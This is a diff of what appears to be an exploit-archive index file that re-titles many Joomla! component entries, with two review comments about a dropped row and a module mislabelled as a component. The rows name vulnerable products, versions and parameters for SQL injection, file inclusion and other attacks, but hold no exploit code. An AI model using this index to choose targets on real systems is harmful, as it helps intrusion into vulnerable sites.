 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0
@@ -32512,17 +32512,16 @@ id,file,description,date,author,platform,type,port
 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
-35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35956,platforms/php/webapps/35956.txt,"Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0
-35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35958,platforms/php/webapps/35958.txt,"Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35959,platforms/php/webapps/35959.txt,"Joomla! Component 'com_hospital' - SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35960,platforms/php/webapps/35960.txt,"Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0
 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
 35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
-35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0
-35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
+35966,platforms/php/webapps/35966.txt,"Joomla! Component 'com_newssearch' - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
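Review bot: Row 35965 (`com_resman` Cross-Site Scripting) is removed in this hunk with no replacement line, while every other change here only re-titles a description; the header's 17-to-16 line count matches a dropped row rather than a reordered one. Unless the entry is re-added or its file is deleted in a part of the diff outside this view, platforms/php/webapps/35965.txt would be left without an index row, and anyone searching files.csv for that advisory would no longer find it. If the removal is not intended, the row should be restored in the new title format as `35965,platforms/php/webapps/35965.txt,"Joomla! Component 'com_resman' - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0`. If it is intended, the commit description should state why.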
@@ -32549,10 +32548,10 @@ id,file,description,date,author,platform,type,port
 36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0
 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0
 36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0
-36012,platforms/php/webapps/36012.txt,"Joomla! Component Slideshow Gallery - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
+36012,platforms/php/webapps/36012.txt,"Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0
 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",hardware,remote,0
-36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
+36015,platforms/php/webapps/36015.txt,"Joomla! Component 'com_community' - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0
 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
 36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0
@@ -32697,7 +32696,7 @@ id,file,description,date,author,platform,type,port
 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
 36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0
-36171,platforms/php/webapps/36171.txt,"Joomla! Component com_biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
+36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
 36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0
@@ -32743,19 +32742,19 @@ id,file,description,date,author,platform,type,port
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0
-36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
+36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
 36217,platforms/windows/remote/36217.txt,"GoAhead WebServer 2.18 - addgroup.asp group Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
 36218,platforms/windows/remote/36218.txt,"GoAhead WebServer 2.18 - addlimit.asp url Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
 36219,platforms/windows/remote/36219.txt,"GoAhead WebServer 2.18 - adduser.asp Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
-36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
-36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
-36222,platforms/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36221,platforms/php/webapps/36221.txt,"Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0
 36225,platforms/php/webapps/36225.txt,"ContaoCMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0
 36226,platforms/php/webapps/36226.txt,"Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
-36227,platforms/php/webapps/36227.txt,"Joomla! Component Sgicatalog 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0
+36227,platforms/php/webapps/36227.txt,"Joomla! Component 'com_sgicatalog' 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0
 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
 36230,platforms/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0
@@ -32820,11 +32819,11 @@ id,file,description,date,author,platform,type,port
 36295,platforms/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0
 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0
 36297,platforms/php/webapps/36297.txt,"AShop - Open-redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0
-36298,platforms/php/webapps/36298.txt,"Joomla! Extension com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
+36298,platforms/php/webapps/36298.txt,"Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0
 36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
-36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
+36302,platforms/php/webapps/36302.txt,"Joomla! Component 'com_content' - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80
 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555
 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
@@ -32989,10 +32988,10 @@ id,file,description,date,author,platform,type,port
 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0
-36469,platforms/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
+36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0
 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0
-36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
+36472,platforms/php/webapps/36472.txt,"Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0
@@ -33062,7 +33061,7 @@ id,file,description,date,author,platform,type,port
 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0
 36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0
 36548,platforms/java/webapps/36548.txt,"Contus Job Portal - 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0
-36549,platforms/php/webapps/36549.txt,"Joomla! Component HD Video Share 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0
+36549,platforms/php/webapps/36549.txt,"Joomla! Component 'com_contushdvideoshare' 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0
 36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps,0
 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -33098,16 +33097,16 @@ id,file,description,date,author,platform,type,port
 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow (4)",2012-01-21,red-dragon,windows,remote,0
 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
-36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
+36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0
-36591,platforms/php/webapps/36591.txt,"Joomla! Component Full 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36592,platforms/php/webapps/36592.txt,"Joomla! Component com_sanpham - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36593,platforms/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
-36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36596,platforms/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36592,platforms/php/webapps/36592.txt,"Joomla! Component 'com_sanpham' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
+36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36598,platforms/php/webapps/36598.txt,"Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
 36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
@@ -33131,28 +33130,28 @@ id,file,description,date,author,platform,type,port
 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0
 36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0
-36624,platforms/php/webapps/36624.txt,"Joomla! Component com_jesubmit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
+36624,platforms/php/webapps/36624.txt,"Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0
-36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
-36630,platforms/php/webapps/36630.txt,"Joomla! Component com_products - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36629,platforms/php/webapps/36629.txt,"Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36630,platforms/php/webapps/36630.txt,"Joomla! Component 'com_products' - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
 36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0
 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0
 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0
-36634,platforms/php/webapps/36634.txt,"Joomla! Component com_visa - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
-36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36634,platforms/php/webapps/36634.txt,"Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
+36635,platforms/php/webapps/36635.txt,"Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
-36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
-36639,platforms/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36638,platforms/php/webapps/36638.txt,"Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
+36639,platforms/php/webapps/36639.txt,"Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0
 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
-36642,platforms/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36642,platforms/php/webapps/36642.txt,"Joomla! Component 'com_bbs' - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
 36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0
 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
-36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
+36646,platforms/php/webapps/36646.txt,"Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
 36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0
 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
@@ -33163,9 +33162,9 @@ id,file,description,date,author,platform,type,port
 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
-36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
+36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0
-36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
+36659,platforms/php/webapps/36659.txt,"Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0
 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0
 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
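Review bot: The new title for row 36659 reads `Joomla! Component 'mod_currencyconverter'`, but `mod_` is Joomla's prefix for modules while components use `com_`, so the type label and the identifier disagree. Anyone triaging exposure by extension type from this index would file the entry under the wrong category. Keeping the identifier and correcting the label gives `"Joomla! Module 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting"`.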
@@ -33330,8 +33329,8 @@ id,file,description,date,author,platform,type,port
 36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
 36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 - dnat.cgi createrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
 36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 - dansguardian.cgi addrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
-36834,platforms/php/webapps/36834.txt,"Joomla! Component X-Shop - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0
-36835,platforms/php/webapps/36835.txt,"Joomla! Component Xcomp 'com_xcomp' - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
+36834,platforms/php/webapps/36834.txt,"Joomla! Component 'com_x-shop' - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0
+36835,platforms/php/webapps/36835.txt,"Joomla! Component 'com_xcomp' - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0
 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
